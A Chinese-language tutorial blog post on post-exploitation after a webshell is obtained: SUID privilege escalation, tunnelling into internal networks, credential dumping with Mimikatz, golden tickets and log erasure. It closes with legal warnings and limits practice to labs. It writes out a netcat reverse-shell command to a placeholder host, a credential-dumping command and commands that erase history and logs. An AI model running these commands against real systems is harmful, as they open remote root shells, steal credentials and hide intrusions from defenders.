导读当你终于拿到了网站的 Webshell上一期内容故事其实才刚刚开始。企业的核心资产通常在内网OA系统、财务数据库、域控制器DC。本期我们将模拟APT高级持续性威胁的攻击链带你看看黑客在拿到服务器后是如何一步步拿下整个公司的。一、 什么是后渗透定义在成功利用漏洞获取目标系统权限Shell之后进行的一系列操作。目标权限提升从普通用户www-data变成root或System。信息收集内网我是谁我在哪周围还有谁横向移动利用当前机器作为跳板攻击内网其他机器。权限维持即使服务器重启我还能连上来。二、 实战演练Linux 靶机提权Privilege Escalation假设你通过文件上传拿到了一个 Webshell但权限很低。1. 信息收集Recon在 Webshell 中执行whoami # 我是谁 (www-data) uname -a # 内核版本是什么 sudo -l # 我能用 sudo 执行什么命令 find / -perm -4000 2/dev/null # 查找带有 SUID 位的程序提权常用2. 利用 SUID 提权经典手法如果发现find命令有 SUID 权限# 在 Webshell 中执行 find /var/www -exec whoami \;结果如果返回root说明可以利用find命令以 root 身份执行任意命令。Getshellfind /var/www -exec netcat -e /bin/sh 1.2.3.4 4444 \;攻击机监听 4444 端口即可获得Root Shell。三、 内网穿透架设“隧道”Web 服务器通常有两张网卡一张对外一张对内。你无法直接访问内网192.168.x.x需要通过隧道Tunneling技术。1. SSH 隧道正向/反向场景目标内网有一台 MySQL3306端口只允许本地访问。操作# 在跳板机上执行将内网3306转发到你本地 ssh -N -f -L 3307:192.168.1.100:3306 userweb-server现在你连接127.0.0.1:3307就等于连接了内网的 MySQL。2. 使用 Neo-reGeorg / Frp这是现代红队最常用的工具。通过在 Webshell 中上传一个tunnel.php建立 HTTP 隧道将内网流量代理出来。四、 横向移动拿下域控Domain Controller这是后渗透的“圣杯”。1. 窃取凭据Credential DumpingLinux翻找配置文件config.php数据库密码、SSH 私钥id_rsa。Windows使用 Mimikatz 抓取内存中的明文密码或 NTLM Hash。powershellsekurlsa::logonpasswords2. 黄金票据Golden Ticket如果你拿到了域控的krbtgt用户的 Hash你可以伪造任意用户的票据Ticket直接访问域内所有资源且无视密码修改。这是权限维持的最高境界。五、 痕迹清理Covering Tracks做完所有操作后职业渗透师必须清理痕迹防止被蓝队防守方溯源。清除历史命令history -c。清除日志echo /var/log/auth.log。删除上传的工具shred -zu nmap webshell.php。⚠️ 安全警示与法律红线后渗透篇 最高级别的危险警告严禁横向移动在 SRC漏洞众测或普通授权测试中严禁利用已拿到的服务器攻击内网其他机器。这通常超出了授权范围属于违法行为。严禁权限维持绝对禁止在企业系统中留后门、留公钥SSH Key或创建隐藏账户。一经发现不仅会被取消测试资格还可能面临法律诉讼。靶场环境本篇提到的提权、内网穿透技术仅限在 HTB (Hack The Box)、VulnHub 或自建的隔离虚拟机环境中练习。后渗透是“核威慑”。你必须懂它才能防御它但绝不能乱用它除非你想在监狱里度过余生。 互动环节在提权过程中你遇到过最坑的情况是什么比如内核太新没有 EXP你认为在内网渗透中是技术重要还是社工密码复用重要欢迎在评论区留言讨论
